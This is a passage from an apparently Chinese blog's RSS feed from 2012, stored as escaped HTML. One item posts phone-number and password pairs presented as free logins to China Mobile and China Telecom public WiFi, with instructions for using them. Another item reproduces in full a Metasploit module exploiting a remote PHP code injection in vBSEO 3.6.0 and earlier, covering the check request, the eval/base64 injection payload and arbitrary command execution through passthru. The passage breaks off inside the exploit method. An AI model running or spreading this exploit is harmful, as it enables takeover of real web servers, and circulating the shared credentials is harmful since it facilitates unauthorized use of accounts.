id=fp&gt;【中国移动公共wifi的密码】&lt;br&gt;卡号：15821275836密码：159258&amp;nbsp;&lt;br&gt;卡号：15800449592密码：159258&amp;nbsp;&lt;br&gt;卡号：15800449954密码：159258&amp;nbsp;&lt;br&gt;卡号：15800449940密码：159258&lt;br&gt;&lt;br&gt;中国电信但凡你的手机能搜到中国电信的chinanet的热点覆盖，全国公免账号07953591377密码3591377&amp;nbsp;。&lt;br&gt;&lt;br&gt;说明：&lt;br&gt;可能有很多人已经知道了，我只是给还不知道的人扫一下盲&lt;br&gt;&lt;br&gt;可能有些人不知道怎么用，首先就是要你所在的地方能搜到移动或电信的公共wifi信号，目前此信号覆盖的还不是很广。但还是会有人能搜到吧，比如我！搜到之后先用你的设备连接移动的wifi网络，就会跳出网页，要你输入手机号和密码（就是我上面提供的那个），输入后可用的话，就可以上网了。&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/603220393/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1799&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</content:encoded><trackback:ping>http://www.cnyzy.cn/trackback.asp?tbID=1799</trackback:ping><wfw:commentRss>http://www.cnyzy.cn/blogfeed.asp?logID=1799</wfw:commentRss><description>&lt;p id=fp&gt;【中国移动公共wifi的密码】&lt;br&gt;卡号：15821275836密码：159258&amp;nbsp;&lt;br&gt;卡号：15800449592密码：159258&amp;nbsp;&lt;br&gt;卡号：15800449954密码：159258&amp;nbsp;&lt;br&gt;卡号：15800449940密码：159258&lt;/p&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/603220393/cnyzy/feedsky/s.gif?r=http://www.cnyzy.cn/blogview.asp?logID=1799&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;</description><category>业界资讯</category><pubDate>Tue, 14 Feb 2012 12:22:39 +0800</pubDate><author>kawen</author><comments>http://www.cnyzy.cn/blogview.asp?logID=1799#comment</comments><guid isPermaLink="false">http://www.cnyzy.cn/blogview.asp?logID=1799</guid><dc:creator>kawen</dc:creator><fs:srclink>http://www.cnyzy.cn/blogview.asp?logID=1799</fs:srclink><fs:srcfeed>http://www.cnyzy.cn/blogfeed.asp</fs:srcfeed><fs:itemid>feedsky/cnyzy/~1471012/603220393/1477126</fs:itemid></item><item><title>vBSEO &lt;= 3.6.0 Injection Exploit</title><link>http://www.cnyzy.cn/blogview.asp?logID=1798</link><content:encoded>&lt;p id=fp&gt;&lt;strong&gt;vBSEO&amp;nbsp;&amp;lt;=&amp;nbsp;3.6.0&amp;nbsp;&amp;quot;proc_deutf()&amp;quot;&amp;nbsp;Remote&amp;nbsp;PHP&amp;nbsp;Code&amp;nbsp;Injection&amp;nbsp;Exploit&lt;/strong&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;require&amp;nbsp;&amp;#39;msf/core&amp;#39;&amp;nbsp;&lt;br&gt;&lt;br&gt;class&amp;nbsp;Metasploit3&amp;nbsp;&amp;lt;&amp;nbsp;Msf::Exploit::Remote&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;include&amp;nbsp;Msf::Exploit::Remote::HttpClient&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;def&amp;nbsp;initialize(info&amp;nbsp;=&amp;nbsp;{})&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;super(update_info(info,&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;Name&amp;#39;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=&amp;gt;&amp;nbsp;&amp;#39;vBSEO&amp;nbsp;&amp;lt;=&amp;nbsp;3.6.0&amp;nbsp;&amp;quot;proc_deutf()&amp;quot;&amp;nbsp;Remote&amp;nbsp;PHP&amp;nbsp;Code&amp;nbsp;Injection&amp;#39;,&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;Description&amp;#39;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=&amp;gt;&amp;nbsp;%q{&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;This&amp;nbsp;module&amp;nbsp;exploits&amp;nbsp;a&amp;nbsp;vulnerability&amp;nbsp;in&amp;nbsp;the&amp;nbsp;&amp;#39;proc_deutf()&amp;#39;&amp;nbsp;function&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;defined&amp;nbsp;in&amp;nbsp;/includes/functions_vbseocp_abstract.php.&amp;nbsp;User&amp;nbsp;input&amp;nbsp;passed&amp;nbsp;through&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;char_repl&amp;#39;&amp;nbsp;POST&amp;nbsp;parameter&amp;nbsp;isn&amp;#39;t&amp;nbsp;properly&amp;nbsp;sanitized&amp;nbsp;before&amp;nbsp;being&amp;nbsp;used&amp;nbsp;in&amp;nbsp;a&amp;nbsp;call&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;to&amp;nbsp;preg_replace()&amp;nbsp;function&amp;nbsp;which&amp;nbsp;uses&amp;nbsp;the&amp;nbsp;&amp;#39;e&amp;#39;&amp;nbsp;modifier.&amp;nbsp;This&amp;nbsp;can&amp;nbsp;be&amp;nbsp;exploited&amp;nbsp;to&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;inject&amp;nbsp;and&amp;nbsp;execute&amp;nbsp;arbitrary&amp;nbsp;code&amp;nbsp;leveraging&amp;nbsp;the&amp;nbsp;PHP&amp;#39;s&amp;nbsp;complex&amp;nbsp;curly&amp;nbsp;syntax.&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;},&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;Author&amp;#39;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=&amp;gt;&amp;nbsp;&amp;#39;EgiX&amp;nbsp;&amp;lt;n0b0d13s[at]gmail.com&amp;gt;&amp;#39;,&amp;nbsp;#&amp;nbsp;originally&amp;nbsp;reported&amp;nbsp;by&amp;nbsp;the&amp;nbsp;vendor&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;License&amp;#39;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=&amp;gt;&amp;nbsp;MSF_LICENSE,&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;Version&amp;#39;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=&amp;gt;&amp;nbsp;&amp;#39;$Revision$&amp;#39;,&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;References&amp;#39;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=&amp;gt;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[&amp;#39;BID&amp;#39;,&amp;nbsp;&amp;#39;51647&amp;#39;],&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[&amp;#39;URL&amp;#39;,&amp;nbsp;&amp;#39;&lt;a href=&quot;http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/&amp;#39;&quot; target=&quot;_blank&quot;&gt;http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/&amp;#39;&lt;/a&gt;],&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;],&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;Privileged&amp;#39;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=&amp;gt;&amp;nbsp;false,&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;Payload&amp;#39;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=&amp;gt;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;DisableNops&amp;#39;&amp;nbsp;=&amp;gt;&amp;nbsp;true,&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;Space&amp;#39;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=&amp;gt;&amp;nbsp;8190,&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;Keys&amp;#39;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=&amp;gt;&amp;nbsp;[&amp;#39;php&amp;#39;],&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;},&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;Platform&amp;#39;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=&amp;gt;&amp;nbsp;[&amp;#39;php&amp;#39;],&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;Arch&amp;#39;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=&amp;gt;&amp;nbsp;ARCH_PHP,&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;Targets&amp;#39;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=&amp;gt;&amp;nbsp;[[&amp;nbsp;&amp;#39;Automatic&amp;#39;,&amp;nbsp;{&amp;nbsp;}]],&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;DisclosureDate&amp;#39;&amp;nbsp;=&amp;gt;&amp;nbsp;&amp;#39;Jan&amp;nbsp;23&amp;nbsp;2012&amp;#39;,&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;DefaultTarget&amp;#39;&amp;nbsp;&amp;nbsp;=&amp;gt;&amp;nbsp;0))&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;register_options(&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;[&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;OptString.new(&amp;#39;URI&amp;#39;,&amp;nbsp;[true,&amp;nbsp;&amp;quot;The&amp;nbsp;full&amp;nbsp;URI&amp;nbsp;path&amp;nbsp;to&amp;nbsp;vBulletin&amp;quot;,&amp;nbsp;&amp;quot;/vb/&amp;quot;]),&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;],&amp;nbsp;self.class)&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;end&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;def&amp;nbsp;check&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;flag&amp;nbsp;=&amp;nbsp;rand_text_alpha(rand(10)+10)&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;data&amp;nbsp;=&amp;nbsp;&amp;quot;char_repl=&amp;#39;{${print(#{flag})}}&amp;#39;=&amp;gt;&amp;quot;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;uri&amp;nbsp;=&amp;nbsp;&amp;#39;&amp;#39;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;uri&amp;nbsp;&amp;lt;&amp;lt;&amp;nbsp;datastore[&amp;#39;URI&amp;#39;]&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;uri&amp;nbsp;&amp;lt;&amp;lt;&amp;nbsp;&amp;#39;/&amp;#39;&amp;nbsp;if&amp;nbsp;uri[-1,1]&amp;nbsp;!=&amp;nbsp;&amp;#39;/&amp;#39;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;uri&amp;nbsp;&amp;lt;&amp;lt;&amp;nbsp;&amp;#39;vbseocp.php&amp;#39;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;response&amp;nbsp;=&amp;nbsp;send_request_cgi({&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;method&amp;#39;&amp;nbsp;=&amp;gt;&amp;nbsp;&amp;quot;POST&amp;quot;,&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;uri&amp;#39;&amp;nbsp;=&amp;gt;&amp;nbsp;uri,&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#39;data&amp;#39;&amp;nbsp;=&amp;gt;&amp;nbsp;&amp;quot;#{data}&amp;quot;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;})&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if&amp;nbsp;response.code&amp;nbsp;==&amp;nbsp;200&amp;nbsp;and&amp;nbsp;response.body&amp;nbsp;=~&amp;nbsp;/#{flag}/&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return&amp;nbsp;Exploit::CheckCode::Vulnerable&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;end&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return&amp;nbsp;Exploit::CheckCode::Safe&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;end&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;def&amp;nbsp;exploit&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if&amp;nbsp;datastore[&amp;#39;CMD&amp;#39;]&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;p&amp;nbsp;=&amp;nbsp;&amp;quot;passthru(\&amp;quot;%s\&amp;quot;);&amp;quot;&amp;nbsp;%&amp;nbsp;datastore[&amp;#39;CMD&amp;#39;]&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;p&amp;nbsp;=&amp;nbsp;Rex::Text.encode_base64(p)&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;else&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;p&amp;nbsp;=&amp;nbsp;Rex::Text.encode_base64(payload.encoded)&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;end&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;data&amp;nbsp;=&amp;nbsp;&amp;quot;char_repl=&amp;#39;{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}&amp;#39;=&amp;gt;&amp;quot;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;uri&amp;nbsp;=&amp;nbsp;&amp;#39;&amp;#39;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;uri&amp;nbsp;&amp;lt;&amp;lt;&amp;nbsp;datastore[&amp;#39;URI&amp;#39;]&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;uri&amp;nbsp;&amp;lt;&amp;lt;&amp;nbsp;&amp;#39;/&amp;#39;&amp;nbsp;if&amp;nbsp;uri[-1,1]&amp;nbsp;!=&amp;nbsp;&amp;#39;/&amp;#39;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;uri&amp;nbsp;&amp;lt;&amp;lt;&amp;nbsp;&amp;#39;vbseocp.php&amp;#39;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;response&amp;nbsp;=&amp;nbsp;send_request_cgi({&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nb